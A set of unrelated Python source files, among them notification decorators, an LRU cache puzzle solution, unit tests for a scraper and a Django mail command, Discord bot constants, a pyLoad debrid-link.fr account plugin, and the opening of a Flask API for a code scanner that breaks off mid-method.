    ``Exception`` (such as ``keystone.exception.NotFound``).

    :param operation: operation being performed (created, updated, deleted)
    :param resource_type: type of resource being affected
    :param host: host of the resource (optional)
    """
    def __init__(self, operation, resource_type, host=None):
        self.operation = operation
        self.resource_type = resource_type
        self.host = host

    def __call__(self, f):
        # functools.wraps preserves f's name/docstring on the wrapper so the
        # decorated Manager method stays introspectable (the original wrapper
        # dropped this metadata).
        @functools.wraps(f)
        def wrapper(*args, **kwargs):
            """Send a notification if the wrapped callable is successful."""
            try:
                result = f(*args, **kwargs)
            except Exception:
                # Propagate failures untouched; no notification is sent.
                raise
            else:
                _send_notification(
                    self.operation,
                    self.resource_type,
                    args[1],  # f(self, resource_id, ...)
                    self.host)
            return result
        return wrapper
def created(*args, **kwargs):
    """Decorator to send notifications for ``Manager.create_*`` methods."""
    # args/kwargs forward (resource_type, host=...) to the wrapper.
    return ManagerNotificationWrapper('created', *args, **kwargs)
def updated(*args, **kwargs):
    """Decorator to send notifications for ``Manager.update_*`` methods."""
    # args/kwargs forward (resource_type, host=...) to the wrapper.
    return ManagerNotificationWrapper('updated', *args, **kwargs)
def deleted(*args, **kwargs):
    """Decorator to send notifications for ``Manager.delete_*`` methods."""
    # args/kwargs forward (resource_type, host=...) to the wrapper.
    return ManagerNotificationWrapper('deleted', *args, **kwargs)
def _send_notification(operation, resource_type, resource_id, host=None):
    """Send notification to inform observers about the affected resource.

    This method doesn't raise an exception when sending the notification fails.

    :param operation: operation being performed (created, updated, or deleted)
    :param resource_type: type of resource being operated on
    :param resource_id: ID of resource being operated on
    :param host: resource host
    """
    context = {}
    payload = {'resource_info': resource_id}
    service = 'identity'
    publisher_id = notifier_api.publisher_id(service, host=host)
    # e.g. "identity.project.created"
    event_type = '%(service)s.%(resource_type)s.%(operation)s' % {
        'service': service,
        'resource_type': resource_type,
        'operation': operation}
    try:
        notifier_api.notify(
            context, publisher_id, event_type, notifier_api.INFO, payload)
    except Exception:
        # NOTE(review): `_` is not imported here -- presumably installed as a
        # gettext builtin by the project's bootstrap; confirm.
        msg = (_('Failed to send %(res_id)s %(event_type)s notification') %
               {'res_id': resource_id, 'event_type': event_type})
        LOG.exception(msg)
|
from time import perf_counter_ns as ns
from collections import deque as dq
def solution(cacheSize, cities):
    """LRU cache cost: 1 per hit, 5 per miss; lookups are case-insensitive."""
    if not cacheSize:
        # Zero-sized cache: every lookup is a miss.
        return len(cities) * 5
    cost = 0
    cache = dq([])
    for name in cities:
        name = name.lower()
        if name in cache:
            # Hit: refresh recency by moving the entry to the back.
            cache.remove(name)
            cache.append(name)
            cost += 1
        else:
            # Miss: evict the least recently used entry when full.
            if len(cache) == cacheSize:
                cache.popleft()
            cache.append(name)
            cost += 5
    return cost
if __name__ == '__main__':
    ITERATIONS = 1_000
    print(f'Running the basic tests {ITERATIONS:,} times...')
    # (cacheSize, cities, expected cost) fixtures.
    tests = (
        (3, ["Jeju", "Pangyo", "Seoul", "NewYork", "LA", "Jeju", "Pangyo",
             "Seoul", "NewYork", "LA"], 50),
        (3, ["Jeju", "Pangyo", "Seoul", "Jeju", "Pangyo", "Seoul", "Jeju",
             "Pangyo", "Seoul"], 21),
        (2, ["Jeju", "Pangyo", "Seoul", "NewYork", "LA", "SanFrancisco",
             "Seoul", "Rome", "Paris", "Jeju", "NewYork", "Rome"], 60),
        (5, ["Jeju", "Pangyo", "Seoul", "NewYork", "LA", "SanFrancisco",
             "Seoul", "Rome", "Paris", "Jeju", "NewYork", "Rome"], 52),
        (2, ["Jeju", "Pangyo", "NewYork", "newyork"], 16),
        (0, ["Jeju", "Pangyo", "Seoul", "NewYork", "LA"], 25)
    )
    for size, cities, expected in tests:
        print(f'solution({size}, {cities}) returned', end=' ')
        if (result := solution(size, cities)) == expected:
            print(f'the expected result {expected}', end=' ')
            # Micro-benchmark the correct case: min/max/avg in nanoseconds.
            fastest = float('inf')
            slowest = total = 0
            for _ in range(ITERATIONS):
                start = ns()
                solution(size, cities)
                end = ns()
                time = end - start
                fastest, slowest = min(time, fastest), max(time, slowest)
                total += time
            print(f'in an average of {total / ITERATIONS / 1e3:,.2f}μs '
                  f'(min: {fastest / 1e3:,.2f}μs, '
                  f'max: {slowest / 1e3:,.2f}μs)')
        else:
            print(f'a wrong result {result} (expected: {expected})')
|
"""Module containing tests for the index based Exports Site data source"""
import os
from collections import Iterator
from datetime import date, timedelta
from typing import Optional
from unittest import TestCase, main
from unittest.mock import patch, Mock, call
from selenium import webdriver
from judah.sources.export_site.index_based import IndexBasedExportSiteSource
_PARENT_FOLDER = os.path.dirname(__file__)
_MOCK_ASSET_FOLDER_PATH = os.path.join(os.path.dirname(os.path.dirname(_PARENT_FOLDER)), 'assets')
class ChildIndexBasedExportSiteSource(IndexBasedExportSiteSource):
    """Child export site source that just picks a file from the file system"""
    base_uri: str = 'http://example.com'
    name: str = 'test_export_site_source'

    def _download_file(self, current_option_index: int) -> Optional[str]:
        """Downloads the CSV from the export site and returns the path to it.

        Stub implementation; the tests below patch this method with a mock.
        """
        return None
class TestIndexBasedExportSiteSource(TestCase):
    """Tests for the IndexBasedExportSiteSource.

    NOTE(review): this module imports ``Iterator`` from ``collections``
    (see module imports); that alias was removed in Python 3.10 and should
    come from ``collections.abc``.
    """
    def setUp(self) -> None:
        """Initialize some variables"""
        # Expected parse of assets/mock.csv used by the download mocks.
        self.mock_csv_file_path = os.path.join(_MOCK_ASSET_FOLDER_PATH, 'mock.csv')
        self.expected_data = [
            {"Date": "09/03/2020", "number": "1", "period_from": "00:00", "period_until": "00:15", "Capacity": "16616"},
            {"Date": "09/03/2020", "number": "2", "period_from": "00:15", "period_until": "00:30", "Capacity": "16616"},
            {"Date": "09/03/2020", "number": "3", "period_from": "00:30", "period_until": "00:45", "Capacity": "16616"},
            {"Date": "09/03/2020", "number": "4", "period_from": "00:45", "period_until": "01:00", "Capacity": "16620"},
        ]
    @patch('judah.sources.export_site.index_based.visit_website')
    def test_initialize_chrome(self, mock_visit_website):
        """
        Should initialize Chrome in case it is not yet initialized and visits the base url
        """
        index_based_export_site_source = ChildIndexBasedExportSiteSource()
        self.assertIsNone(index_based_export_site_source.chrome)
        index_based_export_site_source._initialize_chrome()
        self.assertIsInstance(index_based_export_site_source.chrome, webdriver.Chrome)
        mock_visit_website.assert_called_once_with(
            driver=index_based_export_site_source.chrome, website_url=index_based_export_site_source.base_uri)
        # Tear down the real browser started by _initialize_chrome.
        index_based_export_site_source.chrome.close()
        index_based_export_site_source.chrome.quit()
    @patch('judah.sources.export_site.index_based.delete_parent_folder')
    @patch.object(ChildIndexBasedExportSiteSource, '_initialize_chrome')
    @patch.object(ChildIndexBasedExportSiteSource, '_download_file')
    def test_query_data_source(self, mock_download_file, mock_initialize_chrome, mock_delete_parent_folder):
        """
        Should download all the files in the file list on the export site, one after the other,
        and return an iterator with data records and then deletes folder
        """
        # initializations
        mock_download_file.return_value = self.mock_csv_file_path
        number_of_files = 5
        index_based_export_site_source = ChildIndexBasedExportSiteSource(number_of_indices=number_of_files)
        # method call
        response = index_based_export_site_source._query_data_source()
        self.assertIsInstance(response, Iterator)
        data = [record for record in response]
        # assertions
        mock_initialize_chrome.assert_called_once()
        mock_download_file_calls = [call(current_option_index=index) for index in range(number_of_files)]
        mock_download_file.assert_has_calls(mock_download_file_calls)
        mock_delete_parent_folder_calls = [call(self.mock_csv_file_path) for index in range(number_of_files)]
        mock_delete_parent_folder.assert_has_calls(mock_delete_parent_folder_calls)
        # One copy of the mock CSV's records per downloaded file.
        records_from_all_files = []
        for index in range(number_of_files):
            records_from_all_files += self.expected_data.copy()
        self.assertListEqual(data, records_from_all_files)
    @patch('judah.sources.export_site.index_based.delete_parent_folder')
    @patch.object(ChildIndexBasedExportSiteSource, '_initialize_chrome')
    @patch.object(ChildIndexBasedExportSiteSource, '_download_file')
    def test_query_data_source_no_file_downloaded(self, mock_download_file, mock_initialize_chrome,
                                                  mock_delete_parent_folder):
        """
        Should return an empty iterator if there is no file downloaded
        """
        # initializations
        mock_download_file.return_value = None
        number_of_files = 5
        index_based_export_site_source = ChildIndexBasedExportSiteSource(number_of_indices=number_of_files)
        # method call
        response = index_based_export_site_source._query_data_source()
        self.assertIsInstance(response, Iterator)
        data = [record for record in response]
        # assertions
        mock_initialize_chrome.assert_called_once()
        mock_download_file_calls = [call(current_option_index=index) for index in range(number_of_files)]
        mock_download_file.assert_has_calls(mock_download_file_calls)
        mock_delete_parent_folder.assert_not_called()
        self.assertListEqual(data, [])
    @patch.object(ChildIndexBasedExportSiteSource, '_initialize_chrome')
    def test_del(self, mock_initialize_chrome):
        """
        Should quit chrome on deletion
        """
        index_based_export_site_source = ChildIndexBasedExportSiteSource()
        index_based_export_site_source.chrome = Mock(spec=webdriver.Chrome)
        index_based_export_site_source.__del__()
        index_based_export_site_source.chrome.quit.assert_called_once()
    @patch.object(ChildIndexBasedExportSiteSource, '_query_data_source')
    def test_get(self, mock_query_data_source):
        """
        Should return data from the list of files as an iterator
        """
        mock_query_data_source.return_value = (record for record in self.expected_data)
        number_of_files = 5
        index_based_export_site_source = ChildIndexBasedExportSiteSource(number_of_indices=number_of_files)
        response = index_based_export_site_source.get()
        self.assertIsInstance(response, Iterator)
        data = [record for record in response]
        self.assertListEqual(data, self.expected_data)
if __name__ == '__main__':
main()
|
import logging, motor.motor_asyncio
from os import environ
from typing import NamedTuple
from dotenv import load_dotenv
import nextcord
import yarl
load_dotenv()  # populate os.environ from a local .env before reading config
# Public names exported by this constants module.
# NOTE(review): "Stats" is listed here but no Stats class is defined in this
# module, while the defined ``Source`` class is not exported -- confirm.
__all__ = (
    "Algolia",
    "Client",
    "Colours",
    "Database",
    "Emojis",
    "Icons",
    "Stats",
    "Tokens",
    "RapidApi",
    "RedirectOutput",
    "ERROR_REPLIES",
    "NEGATIVE_REPLIES",
    "POSITIVE_REPLIES",
)
log = logging.getLogger(__name__)
class Client(NamedTuple):
    """Core bot configuration, mostly read from the environment.

    NOTE(review): the attributes below carry no type annotations, so on a
    NamedTuple subclass they are plain class attributes rather than tuple
    fields -- confirm this is intentional.
    """
    name = "OpenSource BOT"
    default_prefix = "t!"
    guild_id="932264473408966656"
    # Short (7-char) git SHA of the running revision; defaults to "master".
    version = environ.get("GIT_SHA", "master")[:7]
    bot_version="4.0.1"
    token = environ.get("BOT_TOKEN")
    # Debug is on unless BOT_DEBUG is explicitly set to something != "true".
    debug = environ.get("BOT_DEBUG", "true").lower() == "true"
    github_bot_repo = "https://github.com/abindent/Nextcord-Utility-Bot"
    invite_permissions = nextcord.Permissions(
        view_channel=True,
        send_messages=True,
        send_messages_in_threads=True,
        manage_messages=True,
        manage_threads=True,
        embed_links=True,
        attach_files=True,
        read_message_history=True,
        add_reactions=True,
        use_external_emojis=True,
        # these are enabled for future features, but not currently used
        change_nickname=True,
        create_public_threads=True,
        create_private_threads=True,
        view_audit_log=True,
    )
DEBUG_MODE = Client.debug  # module-level alias for Client.debug
class Algolia:
    """Algolia search credentials read from the environment."""
    ALGOLIA_SEARCH_APP_ID= environ.get("ALGOLIA_SEARCH_APP_ID")
    ALGOLIA_SEARCH_API_KEY= environ.get("ALGOLIA_SEARCH_API_KEY")
class Colours:
    """Named hex colour constants."""
    white = 0xFFFFFF
    blue = 0x0279FD
    bright_green = 0x01D277
    dark_green = 0x1F8B4C
    orange = 0xE67E22
    pink = 0xCF84E0
    purple = 0xB734EB
    soft_green = 0x68C290
    soft_orange = 0xF9CB54
    soft_red = 0xCD6D6D
    yellow = 0xF9F586
    python_blue = 0x4B8BBE
    python_yellow = 0xFFD43B
    grass_green = 0x66FF00
    gold = 0xE6C200
class Database:
    """MongoDB connection configured from MONGO_URI.

    NOTE(review): the Motor client is created at import time as a class
    attribute; confirm this is intended (no lazy connection).
    """
    connection_url = environ.get("MONGO_URI")
    mongo = motor.motor_asyncio.AsyncIOMotorClient(str(connection_url))
    db = mongo["pythonbot"]
class Emojis:
    """Emoji constants: unicode escapes plus guild-specific custom emoji IDs."""
    boxing_glove = "\U0001F94A"
    cross_mark = "\u274C"
    game_die = "\U0001F3B2"
    sunny = "\u2600\ufe0f"
    star = "\u2B50"
    christmas_tree = "\U0001F384"
    check = "\u2611"
    envelope = "\U0001F4E8"
    trashcan = "<:dustbin:949602736633167882>"
    ok_hand = ":ok_hand:"
    hand_raised = "\U0001F64B"
    upload = "\U0001f4dd"
    snekbox = "\U0001f40d"
    member_join = "<:member_join:942985122846752798>"
    # Keycap digit emoji, keyed by value.
    number_emojis = {
        1: "\u0031\ufe0f\u20e3",
        2: "\u0032\ufe0f\u20e3",
        3: "\u0033\ufe0f\u20e3",
        4: "\u0034\ufe0f\u20e3",
        5: "\u0035\ufe0f\u20e3",
        6: "\u0036\ufe0f\u20e3",
        7: "\u0037\ufe0f\u20e3",
        8: "\u0038\ufe0f\u20e3",
        9: "\u0039\ufe0f\u20e3",
    }
    confirmation = "\u2705"
    decline = "\u274c"
    x = "\U0001f1fd"
    o = "\U0001f1f4"
    resume = "<:emoji_1:900445170103889980>"
    pause = "<:emoji_2:900445202899140648>"
    loop = "<:emoji_7:900445329982369802>"
    closeConnection = "<a:closeimout:848156958834032650>"
    mute = "🔇"
    halfvolume = "🔉"
    fullvolume = "🔊"
    # Pagination controls.
    FIRST_EMOJI = "\u23EE"  # [:track_previous:]
    LEFT_EMOJI = "\u2B05"  # [:arrow_left:]
    RIGHT_EMOJI = "\u27A1"  # [:arrow_right:]
    LAST_EMOJI = "\u23ED"  # [:track_next:]
    # Coloured letter emoji (a-z) per colour, as used for letter tiles.
    EMOJI_CODES = {
        "green": {
            "a": "<:a_green:952504070709575710>",
            "b": "<:b_green:952504071737184276>",
            "c": "<:c_green:952504072823521290>",
            "d": "<:d_green:952504073016475709>",
            "e": "<:e_green:952504073842749511>",
            "f": "<:f_green:952504075277205514>",
            "g": "<:g_green:952504077407903744>",
            "h": "<:h_green:952504078011871245>",
            "i": "<:i_green:952504079479894046>",
            "j": "<:j_green:952504080171950120>",
            "k": "<:k_green:952504084571783188>",
            "l": "<:l_green:952504081912582184>",
            "m": "<:m_green:952504086396276787>",
            "n": "<:n_green:952504084408193044>",
            "o": "<:o_green:952504085465141268>",
            "p": "<:p_green:952504085507080213>",
            "q": "<:q_green:952504087272890378>",
            "r": "<:r_green:952504087851728966>",
            "s": "<:s_green:952504311798169600>",
            "t": "<:t_green:952504312498651137>",
            "u": "<:u_green:952504312922255380>",
            "v": "<:v_green:952504313761107988>",
            "w": "<:w_green:952504314843250698>",
            "x": "<:x_green:952504315799543859>",
            "y": "<:y_green:952504316839755816>",
            "z": "<:z_green:952504317770883132>",
        },
        "yellow": {
            "a": "<:a_yellow:952504348628377650>",
            "b": "<:b_yellow:952504349962170378>",
            "c": "<:c_yellow:952504351002341376>",
            "d": "<:d_yellow:952504351421775872>",
            "e": "<:e_yellow:952504352239669308>",
            "f": "<:f_yellow:952504352575209513>",
            "g": "<:g_yellow:952504355418955776>",
            "h": "<:h_yellow:952504357121830912>",
            "i": "<:i_yellow:952504358048759808>",
            "j": "<:j_yellow:952504363253899294>",
            "k": "<:k_yellow:952504363220348938>",
            "l": "<:l_yellow:952504359835541504>",
            "m": "<:m_yellow:952504366668087336>",
            "n": "<:n_yellow:952504363937579028>",
            "o": "<:o_yellow:952504365028085840>",
            "p": "<:p_yellow:952504365996974120>",
            "q": "<:q_yellow:952504368240922635>",
            "r": "<:r_yellow:952504368853319710>",
            "s": "<:s_yellow:952504369453080576>",
            "t": "<:t_yellow:952504370107396096>",
            "u": "<:u_yellow:952504370753318983>",
            "v": "<:v_yellow:952504371327946802>",
            "w": "<:w_yellow:952504372460408853>",
            "x": "<:x_yellow:952504373785813052>",
            "y": "<:y_yellow:952504374876332102>",
            "z": "<:z_yellow:952504375203491842>",
        },
        "gray": {
            "a": "<:a_grey:952503991336574976>",
            "b": "<:b_grey:952503992385175572>",
            "c": "<:c_grey:952503993110777876>",
            "d": "<:d_grey:952503993752498176>",
            "e": "<:e_grey:952503994205495306>",
            "f": "<:f_grey:952503994582966312>",
            "g": "<:g_grey:952503997011492904>",
            "h": "<:h_grey:952503998940860436>",
            "i": "<:i_grey:952504000002031658>",
            "j": "<:j_grey:952504000824090688>",
            "k": "<:k_grey:952504006217986108>",
            "l": "<:l_grey:952504003080650832>",
            "m": "<:m_grey:952504004896784455>",
            "n": "<:n_grey:952504005978906644>",
            "o": "<:o_grey:952504006612250674>",
            "p": "<:p_grey:952504007547564082>",
            "q": "<:q_grey:952504008860377178>",
            "r": "<:r_grey:952504009653108806>",
            "s": "<:s_grey:952504009799917570>",
            "t": "<:t_grey:952504010626195487>",
            "u": "<:u_grey:952504011196616714>",
            "v": "<:v_grey:952504011779616768>",
            "w": "<:w_grey:952504012358451243>",
            "x": "<:x_grey:952504012954013697>",
            "y": "<:y_grey:952504013474123816>",
            "z": "<:z_grey:952504013742571530>",
        },
    }
    # Social
    discord = "<:discord:942984508586725417>"
    youtube = "<:youtube:942984508976795669>"
    github = "<:github:942984509673066568>"
class Icons:
    """External image URLs used as icons in bot embeds."""

    # Question-mark emoji rendered as a plain PNG.
    questionmark = "https://cdn.discordapp.com/emojis/512367613339369475.png"
    # Bookmark emoji, pre-scaled to 20x20 by Discord's image proxy.
    bookmark = (
        "https://images-ext-2.discordapp.net/external/zl4oDwcmxUILY7sD9ZWE2fU5R7n6QcxEmPYSE5eddbg/"
        "%3Fv%3D1/https/cdn.discordapp.com/emojis/654080405988966419.png?width=20&height=20"
    )
class RapidApi:
    """Credentials for RapidAPI-hosted services."""

    # API key read from the environment; None when the variable is unset.
    joke_api = environ.get("JOKE_API")
class RedirectOutput:
    """Settings for command-output redirection messages."""

    # Seconds to wait before the redirect notice is deleted.
    delete_delay: int = 10
class Source:
    """Links describing where the bot's source code lives."""

    # Repository URL, reused from the Client constants defined earlier in this file.
    github = Client.github_bot_repo
    # GitHub's own logo avatar, used as an embed thumbnail.
    github_avatar_url = "https://avatars1.githubusercontent.com/u/9919"
class Tokens(NamedTuple):
    """Secrets read from the environment.

    NOTE(review): these assignments have no type annotations, so
    ``typing.NamedTuple`` treats them as plain class attributes rather than
    tuple fields — confirm this is intentional before adding annotations,
    since annotating them would change the class's behavior.
    """

    secret_id = environ.get("secret_id")
    github = environ.get("GITHUB_TOKEN")
# Bot replies

# Snarky lines used when a command raises an error.
ERROR_REPLIES = [
    "Please don't do that.",
    "You have to stop.",
    "Do you mind?",
    "In the future, don't do that.",
    "That was a mistake.",
    "You blew it.",
    "You're bad at computers.",
    "Are you trying to kill me?",
    "Noooooo!!",
    "I can't believe you've done this",
]

# Lines used when refusing a request.
NEGATIVE_REPLIES = [
    "Noooooo!!",
    "Nope.",
    "I'm sorry Dave, I'm afraid I can't do that.",
    "I don't think so.",
    "Not gonna happen.",
    "Out of the question.",
    "Huh? No.",
    "Nah.",
    "Naw.",
    "Not likely.",
    "No way, José.",
    "Not in a million years.",
    "Fat chance.",
    "Certainly not.",
    "NEGATORY.",
    "Nuh-uh.",
    "Not in my house!",
]

# Lines used when confirming a request.
POSITIVE_REPLIES = [
    "Yep.",
    "Absolutely!",
    "Can do!",
    "Affirmative!",
    "Yeah okay.",
    "Sure.",
    "Sure thing!",
    "You're the boss!",
    "Okay.",
    "No problem.",
    "I got you.",
    "Alright.",
    "You got it!",
    "ROGER THAT",
    "Of course!",
    "Aye aye, cap'n!",
    "I'll allow it.",
]
|
coeffs = np.polyfit(x, y, deg=3)
|
# -*- coding: utf-8 -*-
import hashlib
import json
import time
import pycurl
from ..base.multi_account import MultiAccount
def args(**kwargs):
    """Tiny readability helper: return the keyword arguments as a dict."""
    return dict(kwargs)
class DebridlinkFr(MultiAccount):
    """Debrid-link.fr multi-hoster account plugin.

    Authenticates against the debrid-link.fr REST API and signs every
    request with the session token/key obtained at login.
    """

    __name__ = "DebridlinkFr"
    __type__ = "account"
    __version__ = "0.03"
    __status__ = "testing"

    __pyload_version__ = "0.5"

    __config__ = [
        ("mh_mode", "all;listed;unlisted", "Filter hosters to use", "all"),
        ("mh_list", "str", "Hoster list (comma separated)", ""),
        ("mh_interval", "int", "Reload interval in hours", 12),
    ]

    __description__ = """Debridlink.fr account plugin"""
    __license__ = "GPLv3"
    __authors__ = [("GammaC0de", "nitzo2001[AT]yahoo[DOT]com")]

    API_URL = "https://debrid-link.fr/api"

    def api_request(self, method, data=None, get=None, post=None):
        """Call an API *method* (e.g. ``"/account/infos"``) and return parsed JSON.

        When a cached session exists, the request is signed with
        ``SHA1(timestamp + method + session_key)`` and sent with the
        ``X-DL-*`` headers required by the API.
        """
        # Avoid mutable default arguments.
        get = {} if get is None else get
        post = {} if post is None else post
        session = self.info["data"].get("session", None)
        if session:
            # Timestamp adjusted by the client/server clock delta stored at login.
            ts = str(int(time.time() - float(session["tsd"])))
            m = hashlib.sha1()
            # BUG FIX: the signature payload was previously assigned to `data`,
            # silently clobbering the (unused) `data` parameter.
            payload = ts + method + session["key"]
            m.update(payload.encode())
            sign = m.hexdigest()
            self.req.http.c.setopt(
                pycurl.HTTPHEADER,
                [
                    "X-DL-TOKEN: " + session["token"],
                    "X-DL-SIGN: " + sign,
                    "X-DL-TS: " + ts,
                ],
            )
        json_data = self.load(self.API_URL + method, get=get, post=post)
        return json.loads(json_data)

    def grab_hosters(self, user, password, data):
        """Return the list of supported hoster names (empty on API error)."""
        res = self.api_request("/downloader/hostnames")
        if res["result"] == "OK":
            return res["value"]
        else:
            return []

    def grab_info(self, user, password, data):
        """Return account validity/premium info for pyLoad."""
        res = self.api_request("/account/infos")
        if res["result"] == "OK":
            # premiumLeft is the remaining premium time in seconds.
            premium = res["value"]["premiumLeft"] > 0
            validuntil = res["value"]["premiumLeft"] + time.time()
        else:
            self.log_error(self._("Unable to retrieve account information"), res["ERR"])
            validuntil = None
            premium = None

        return {"validuntil": validuntil, "trafficleft": -1, "premium": premium}

    def signin(self, user, password, data):
        """Log in, reusing a cached session when one is still valid."""
        cache_info = self.db.retrieve("cache_info", {})
        if user in cache_info:
            # Try the cached session first; drop it if the API rejects it.
            self.info["data"]["session"] = cache_info[user]
            res = self.api_request("/account/infos")
            if res["result"] == "OK":
                self.skip_login()
            else:
                del cache_info[user]
                self.db.store("cache_info", cache_info)

        res = self.api_request(
            "/account/login", post=args(pseudo=user, password=password)
        )
        if res["result"] != "OK":
            self.fail_login()

        # Persist the session (server time delta, token and signing key).
        cache_info[user] = {
            "tsd": time.time() - float(res["ts"]),
            "token": res["value"]["token"],
            "key": res["value"]["key"],
        }
        self.info["data"]["session"] = cache_info[user]
        self.db.store("cache_info", cache_info)
|
# Python
from __future__ import unicode_literals
import email.utils
# Django
import django
def test_site_notify_default(command_runner, mailoutbox, settings):
    """Without flags, the notification goes to settings.ADMINS."""
    assert settings.ADMINS
    outcome = command_runner('site_notify')
    assert outcome[0] is None
    assert len(mailoutbox) == 1
    message = mailoutbox[0]
    remaining = {pair[1] for pair in settings.ADMINS}
    for entry in message.to:
        realname, address = email.utils.parseaddr(entry)
        assert address in remaining
        remaining.remove(address)
    assert not remaining
def test_site_notify_managers(command_runner, mailoutbox, settings):
    """--managers sends to the addresses listed in settings.MANAGERS."""
    assert settings.MANAGERS
    outcome = command_runner('site_notify', managers=True)
    assert outcome[0] is None
    assert len(mailoutbox) == 1
    message = mailoutbox[0]
    remaining = {pair[1] for pair in settings.MANAGERS}
    for entry in message.to:
        realname, address = email.utils.parseaddr(entry)
        assert address in remaining
        remaining.remove(address)
    assert not remaining
def test_site_notify_superusers(user_model, super_user, inactive_super_user,
                                command_runner, mailoutbox):
    """--superusers sends only to active superusers."""
    outcome = command_runner('site_notify', superusers=True)
    assert outcome[0] is None
    assert len(mailoutbox) == 1
    message = mailoutbox[0]
    active_supers = user_model.objects.filter(is_active=True, is_superuser=True)
    remaining = set(active_supers.values_list('email', flat=True))
    for entry in message.to:
        realname, address = email.utils.parseaddr(entry)
        assert address in remaining
        remaining.remove(address)
    assert not remaining
def test_site_notify_staff(user_model, super_user, inactive_super_user,
                           staff_user, manager_staff_user, command_runner,
                           mailoutbox):
    """--staff sends only to active staff users."""
    outcome = command_runner('site_notify', staff=True)
    assert outcome[0] is None
    assert len(mailoutbox) == 1
    message = mailoutbox[0]
    active_staff = user_model.objects.filter(is_active=True, is_staff=True)
    remaining = set(active_staff.values_list('email', flat=True))
    for entry in message.to:
        realname, address = email.utils.parseaddr(entry)
        assert address in remaining
        remaining.remove(address)
    assert not remaining
def test_site_notify_managers_staff(user_model, super_user, inactive_super_user,
                                    staff_user, manager_staff_user,
                                    command_runner, mailoutbox, settings):
    """--managers --staff: union of both lists, each address listed once."""
    outcome = command_runner('site_notify', managers=True, staff=True)
    assert outcome[0] is None
    assert len(mailoutbox) == 1
    message = mailoutbox[0]
    active_staff = user_model.objects.filter(is_active=True, is_staff=True)
    remaining = set(active_staff.values_list('email', flat=True))
    remaining.update(pair[1] for pair in settings.MANAGERS)
    for entry in message.to:
        realname, address = email.utils.parseaddr(entry)
        assert address in remaining
        remaining.remove(address)
    assert not remaining
def test_site_notify_all(user_model, super_user, inactive_super_user,
                         staff_user, manager_staff_user, command_runner,
                         mailoutbox, settings):
    """--all: admins + managers + active staff + active superusers."""
    outcome = command_runner('site_notify', all_users=True)
    assert outcome[0] is None
    assert len(mailoutbox) == 1
    message = mailoutbox[0]
    staff_qs = user_model.objects.filter(is_active=True, is_staff=True)
    remaining = set(staff_qs.values_list('email', flat=True))
    super_qs = user_model.objects.filter(is_active=True, is_superuser=True)
    remaining.update(super_qs.values_list('email', flat=True))
    remaining.update(pair[1] for pair in settings.MANAGERS)
    remaining.update(pair[1] for pair in settings.ADMINS)
    for entry in message.to:
        realname, address = email.utils.parseaddr(entry)
        assert address in remaining
        remaining.remove(address)
    assert not remaining
def test_site_notify_bcc(command_runner, mailoutbox, settings):
    """--bcc: default recipients (admins) go in bcc, To: stays empty."""
    outcome = command_runner('site_notify', bcc=True)
    assert outcome[0] is None
    assert len(mailoutbox) == 1
    message = mailoutbox[0]
    remaining = {pair[1] for pair in settings.ADMINS}
    assert not message.to
    for entry in message.bcc:
        realname, address = email.utils.parseaddr(entry)
        assert address in remaining
        remaining.remove(address)
    assert not remaining
def test_site_notify_change_default(command_runner, mailoutbox, settings):
    """SITE_NOTIFY_DEFAULT_RECIPIENTS changes the default recipient groups."""
    assert settings.ADMINS
    assert settings.MANAGERS
    settings.SITE_NOTIFY_DEFAULT_RECIPIENTS = ('admins', 'managers')
    outcome = command_runner('site_notify')
    assert outcome[0] is None
    assert len(mailoutbox) == 1
    message = mailoutbox[0]
    remaining = {pair[1] for pair in settings.ADMINS}
    remaining.update(pair[1] for pair in settings.MANAGERS)
    for entry in message.to:
        realname, address = email.utils.parseaddr(entry)
        assert address in remaining
        remaining.remove(address)
    assert not remaining
def test_site_notify_subject_body(command_runner, mailoutbox):
    """Positional arguments become the subject, then the body paragraphs."""
    outcome = command_runner('site_notify', 'test_subject', 'test_body', 'test_body2')
    assert outcome[0] is None
    assert len(mailoutbox) == 1
    message = mailoutbox[0]
    assert 'test_subject' in message.subject
    for fragment in ('test_body', 'test_body2'):
        assert fragment in message.body
def test_site_notify_templates(command_runner, mailoutbox, settings):
    """Subject/body templates can be overridden via command-line arguments."""
    outcome = command_runner('site_notify',
                             subject_template='new_site_notify_subject.txt',
                             body_template='new_site_notify_body.txt')
    assert outcome[0] is None
    assert len(mailoutbox) == 1
    message = mailoutbox[0]
    # Context-processor variables must be available inside the templates.
    assert 'SITE_ID={}'.format(settings.SITE_ID) in message.subject
    assert 'test_project.urls' in message.body
    assert 'NEW_BODY_SUFFIX' in message.body
def test_site_notify_template_settings(command_runner, mailoutbox, settings):
    """Subject/body templates can be overridden via settings."""
    settings.SITE_NOTIFY_SUBJECT_TEMPLATE = 'new_site_notify_subject.txt'
    settings.SITE_NOTIFY_BODY_TEMPLATE = 'new_site_notify_body.txt'
    outcome = command_runner('site_notify')
    assert outcome[0] is None
    assert len(mailoutbox) == 1
    message = mailoutbox[0]
    assert 'SITE_ID={}'.format(settings.SITE_ID) in message.subject
    assert 'test_project.urls' in message.body
    assert 'NEW_BODY_SUFFIX' in message.body
def test_site_notify_auth_not_installed(command_runner, mailoutbox, settings):
    """Without django.contrib.auth, --superusers errors on Django >= 2.0."""
    settings.INSTALLED_APPS = (
        name for name in settings.INSTALLED_APPS if name != 'django.contrib.auth'
    )
    first = command_runner('site_notify')
    assert first[0] is None
    second = command_runner('site_notify', superusers=True)
    if django.VERSION >= (2, 0):
        assert isinstance(second[0], Exception)
|
# -*- coding: utf-8 -*-
"""
api
~~~
Implements API Server and Interface
:author: Feei <feei@feei.cn>
:homepage: https://github.com/wufeifei/cobra
:license: MIT, see LICENSE for more details.
:copyright: Copyright (c) 2017 Feei. All rights reserved
"""
import socket
import errno
import time
import os
import json
import multiprocessing
import threading
from flask import Flask, request, render_template
from flask_restful import Api, Resource
from . import cli
from .cli import get_sid
from .engine import Running
from .log import logger
from .config import Config, running_path
try:
    # Python 3
    import queue
except ImportError:
    # Python 2
    import Queue as queue

# Shared job queue: AddJob enqueues scan tasks, consumer threads drain it.
q = queue.Queue()

app = Flask(__name__, static_folder='templates/asset')
def producer(task):
    """Enqueue a scan task tuple; a consumer() thread will pick it up."""
    q.put(task)
def consumer():
    """Worker loop: run each queued scan in its own process, one at a time."""
    while True:
        job = q.get()
        scan_proc = multiprocessing.Process(target=cli.start, args=job)
        scan_proc.start()
        scan_proc.join()
        q.task_done()
class AddJob(Resource):
    """POST /api/add — queue one or more scan targets under a batch sid."""

    @staticmethod
    def post():
        data = request.json
        if not data or data == "":
            return {"code": 1003, "result": "Only support json, please post json data."}

        target = data.get("target")
        formatter = data.get("formatter")
